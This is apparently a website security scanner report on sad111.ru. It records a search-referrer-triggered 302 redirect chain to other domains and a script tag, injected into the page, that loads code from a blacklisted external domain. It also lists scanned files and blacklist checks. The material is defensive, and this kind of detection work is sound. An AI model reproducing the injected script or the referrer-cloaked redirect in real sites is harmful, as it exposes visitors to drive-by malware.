Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://sad111.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: sad111.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: post-check=0, pre-check=0 Connection: close Date: Sun, 07 Sep 2014 15:20:26 GMT Pragma: no-cache Location: http://web-redirect.ru/?web Server: Jino.ru/mod_pizza Content-Type: text/html; charset=utf-8 Expires: Mon, 1 Jan 2001 00:00:00 GMT Last-Modified: Sun, 07 Sep 2014 15:20:26 GMT P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Set-Cookie: _cutt_caches_images=1410103226; expires=Mon, 08-Sep-2014 15:20:26 GMT; path=/ Set-Cookie: f987f111799e484667f33ab612c7f923=2c484f121ed31fb858712372c79c6984; path=/ | malicious |
URL: http://web-redirect.ru/?web (imitation of visitor from search engine) GET /?web HTTP/1.1 Host: web-redirect.ru Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Found Cache-Control: max-age=0 Connection: close Date: Sun, 07 Sep 2014 15:20:27 GMT Pragma: no-cache Location: http://ling-kniga.ru/components/com_weblinks/2/separator.php Server: nginx/1.0.15 Content-Length: 0 Content-Type: text/html; charset=utf-8 Expires: Thu, 21 Jul 1977 07:30:00 GMT Last-Modified: Sun, 07 Sep 2014 15:20:27 GMT X-Powered-By: PHP/5.3.3 | suspicious |
Scanned pages/files
Request | Server response | Status |
http://sad111.ru/ | 200 OK Content-Length: 29235 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: turbooceanenergy.com <script type="text/javascript" src="http://turbooceanenergy.com/QSHxLAqi.php?id="></script>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-ru" lang="ru-ru" > <head> <link rel="stylesheet" href="/templates/template/css/template.css" type="text/css" /> <meta http-equiv="content-type" co ...[4681 bytes skipped]... | ||
http://turbooceanenergy.com/QSHxLAqi.php?id= | 500 Can't connect to turbooceanenergy.com:80 (Bad hostname) Content-Length: 172 Content-Type: text/plain | clean |
http://turbooceanenergy.com/test404page.js | 500 Can't connect to turbooceanenergy.com:80 (Bad hostname) Content-Length: 172 Content-Type: text/plain | clean |
http://sad111.ru/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/javascript | clean |
http://sad111.ru/modules/mod_accordion_menu/cache/25/e92052b368007ea225f5a68a413e8e7a.js | 200 OK Content-Length: 109735 Content-Type: application/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sad111.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://sad111.ru/
Result: sad111.ru is not infected or malware details are not published yet.
Result: sad111.ru is not infected or malware details are not published yet.